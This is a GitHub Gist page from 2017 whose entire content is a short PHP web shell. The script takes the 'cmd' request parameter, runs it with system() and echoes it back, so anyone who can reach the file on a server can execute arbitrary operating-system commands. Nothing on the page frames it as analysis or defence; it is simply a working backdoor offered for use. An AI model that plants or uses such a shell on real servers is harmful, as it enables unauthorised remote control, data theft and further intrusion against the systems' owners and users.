Skip to content

Instantly share code, notes, and snippets.

@empijei
Created June 6, 2017 12:35
Show Gist options
  • Save empijei/b0ba953fa549c41d1f5b8341e5fdd7ce to your computer and use it in GitHub Desktop.
Save empijei/b0ba953fa549c41d1f5b8341e5fdd7ce to your computer and use it in GitHub Desktop.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment